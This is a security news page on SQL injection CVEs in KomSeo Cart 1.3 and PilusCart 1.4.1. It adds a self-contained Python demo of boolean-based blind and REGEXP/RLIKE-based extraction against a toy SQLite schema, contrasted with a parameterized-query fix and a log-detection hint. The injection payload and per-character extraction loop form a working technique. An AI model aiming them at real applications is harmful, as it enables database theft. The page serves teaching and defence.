SQL Injection Flaws Disclosed in KomSeo Cart and PilusCart
Two SQL injection vulnerabilities have been disclosed in legacy shopping cart software, affecting KomSeo Cart 1.3 and PilusCart 1.4.1. The KomSeo Cart issue, tracked as CVE-2018-25206, affects the my_item_search parameter in edit.php, where crafted POST requests can trigger boolean-based blind or error-based SQL injection and expose sensitive database contents. The PilusCart flaw, tracked as CVE-2019-25672, affects the send parameter in a comment submission endpoint and allows unauthenticated attackers to perform RLIKE-based boolean SQL injection through POST requests.
Both CVEs are classified as CWE-89 (Improper Neutralization of Special Elements used in an SQL Command) and were published with CVSS v3.1 and CVSS v4.0 scoring metadata. The records link to public references including Exploit-DB, VulnCheck, and project- or vendor-related sources, indicating that exploit details and technical validation are available. Organizations still running either cart platform should treat the flaws as database-compromise risks: successful exploitation lets an attacker read database contents through the affected parameter, and in the PilusCart case this requires no authentication.
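The two techniques named above, boolean-based blind injection through a search parameter and a regex-operator (RLIKE) condition used as the true/false oracle, are easier to reason about with a runnable model. The following is an added example written for this page; it is not code from KomSeo Cart, PilusCart, or their CVE records, and the schema, table names (`items`, `admin`) and secret value are constructed for the demonstration. It uses an in-memory SQLite database, registering a `regexp()` function so that SQLite's `REGEXP` operator stands in for MySQL's `RLIKE` (the two are synonyms on MySQL). It shows the string-concatenated query pattern that produces CWE-89, extracts a value the search endpoint never displays using only "rows returned / no rows" as the signal, and then runs the same payload against the parameterized form of the query.

```python
import re
import sqlite3
import string

# Constructed in-memory schema for the demonstration. The table and column names
# are hypothetical and are not the schema of KomSeo Cart, PilusCart or any real product.
SCHEMA = """
CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO items (name) VALUES ('red mug'), ('blue mug'), ('green plate');
INSERT INTO admin (username, password_hash) VALUES ('admin', 'f3a9c1');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # SQLite ships no RLIKE/REGEXP implementation: "X REGEXP Y" calls a user
    # function regexp(Y, X). Registering one mirrors MySQL's "X RLIKE Y".
    conn.create_function(
        "regexp", 2,
        lambda pattern, value: 1 if value is not None and re.search(pattern, value) else 0,
    )
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """The flawed pattern: the search parameter is concatenated into the SQL text."""
    sql = "SELECT name FROM items WHERE name LIKE '%" + term + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn: sqlite3.Connection, term: str) -> list:
    """The fix: the value is bound as a parameter, so it is data, never SQL.
    LIKE wildcards (% and _) inside the term are still honoured; escape them
    if that matters for the application."""
    sql = "SELECT name FROM items WHERE name LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind probe: a true CONDITION leaves the search matching
    'mug', a false one empties the result set. The trailing '-- ' comments out
    the quote and ORDER BY that follow the injection point."""
    payload = "mug%' AND (" + condition + ") -- "
    return len(search_vulnerable(conn, payload)) > 0


def regexp_condition(pattern: str) -> str:
    # A regex prefix test as the oracle: the same trick RLIKE-based injection
    # uses on MySQL. The column and table are the hypothetical ones above.
    return "(SELECT password_hash FROM admin LIMIT 1) REGEXP '" + pattern + "'"


def extract_blind(conn: sqlite3.Connection,
                  alphabet: str = string.digits + string.ascii_lowercase,
                  max_len: int = 32) -> str:
    """Recover the secret one confirmed character at a time, without it ever
    appearing in a response body. Each oracle() call is one POST in practice."""
    known = ""
    while len(known) < max_len:
        if oracle(conn, regexp_condition("^" + re.escape(known) + "$")):
            return known  # anchored full match: extraction complete
        for ch in alphabet:
            if oracle(conn, regexp_condition("^" + re.escape(known + ch))):
                known += ch
                break
        else:
            break  # nothing in the alphabet extends the prefix; give up
    return known


if __name__ == "__main__":
    db = make_db()
    print("legit search:", search_vulnerable(db, "mug"))
    print("blind-extracted secret:", extract_blind(db))
    print("same payload, parameterized query:", search_hardened(db, "mug%' AND (1=1) -- "))
```

The point the last line makes is the one a code reviewer should look for in either cart: the fix is not filtering `RLIKE`, `AND` or quotes out of the parameter, it is binding the value so the database never parses it as SQL. For detection, the extraction loop is also the signature of this attack class in access logs: one request per character guess, each carrying a near-identical body that differs only in the candidate character, against a single endpoint.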
Timeline
Apr 5, 2026
CVE-2019-25672 recorded for PilusCart 1.4.1 SQL injection
A CVE entry documented an unauthenticated SQL injection vulnerability in PilusCart 1.4.1 via the 'send' parameter in the comment submission endpoint. The issue enables RLIKE-based boolean SQL injection through POST requests and could be used to extract sensitive database information.
Mar 26, 2026
CVE-2018-25206 recorded for KomSeo Cart 1.3 SQL injection
A CVE entry for an SQL injection vulnerability in KomSeo Cart 1.3 was recorded, affecting the 'my_item_search' parameter in edit.php. The flaw allows crafted POST requests to trigger boolean-based blind or error-based SQL injection and extract sensitive database information.
Related Stories

Unauthenticated SQL Injection Flaws Expose Data in CMSsite and XATABoost CMS
Two content management systems were identified with **unauthenticated SQL injection** vulnerabilities that allow remote attackers to tamper with backend database queries and extract sensitive information. `CVE-2019-25697` affects **CMSsite 1.0**, where the `cat_id` parameter in `category.php` can be abused through crafted `GET` requests, potentially exposing usernames, credentials, and other database contents. A separate flaw, `CVE-2018-25300`, affects **XATABoost CMS 1.0.0** through a **union-based SQL injection** in the `id` parameter of `news.php`, also reachable remotely without authentication via crafted `GET` requests. Both records were published with **CWE-89** classification, CVSS v3.1 and v4.0 scoring data, and references to public advisories and exploit resources, underscoring the risk of database compromise in internet-exposed deployments.
3 days ago
Critical File Write and RCE Flaws Disclosed in Shopizer, JeeSite, and Krayin CRM
Newly published CVEs detail severe application-layer vulnerabilities in three widely used web platforms. **Shopizer 3.2.5** is affected by `CVE-2026-36767`, a critical path traversal flaw in the `/content/images/add` endpoint that lets an unauthenticated attacker send a crafted POST request and write arbitrary files to any writable path. **JeeSite 5.15.1** is affected by `CVE-2026-36760`, where the `fileMd5` parameter in `/a/file/upload` can be abused during chunked uploads to traverse directories and write arbitrary files with whitelisted suffixes to attacker-chosen filesystem locations; exploitation requires authenticated access with file upload permissions. A separate high-severity issue, `CVE-2026-36340`, affects **Krayin CRM 2.1.5** and allows remote code execution through the compose email function. The flaw was classified as `CWE-94` and has been fixed in **Krayin CRM 2.1.6**. The Shopizer and JeeSite bugs were both classified as `CWE-22` and carry high-impact CVSS ratings reflecting serious risk to confidentiality and integrity, with Shopizer also exposing availability. Public references for all three issues were added alongside their CVE records, including linked GitHub documentation and issue reports describing the vulnerabilities.
2 days ago
SQL Injection Flaws Expose SourceCodester and CodeAstro Management Apps
MITRE has published two high-severity SQL injection vulnerabilities affecting widely available PHP-based management applications: **SourceCodester Payroll Management and Information System v1.0** and **CodeAstro Simple Attendance Management System v1.0**. The SourceCodester issue, tracked as `CVE-2026-37347`, affects `/payroll/view_employee.php` and is classified as `CWE-89`; its CVSS v3.1 vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N` indicates remote exploitation with no privileges or user interaction required, with high impact to confidentiality and integrity. The CodeAstro flaw, `CVE-2026-37749`, is also a `CWE-89` SQL injection bug and affects `index.php`, where the `username` parameter can be abused by remote, unauthenticated attackers to bypass authentication. Its CVSS v3.1 vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` reflects high impact across confidentiality, integrity, and availability. Both CVE entries were updated with severity details and public references, including GitHub documentation, underscoring the exposure of internet-reachable administrative and employee-management functions to straightforward injection attacks.
2 weeks ago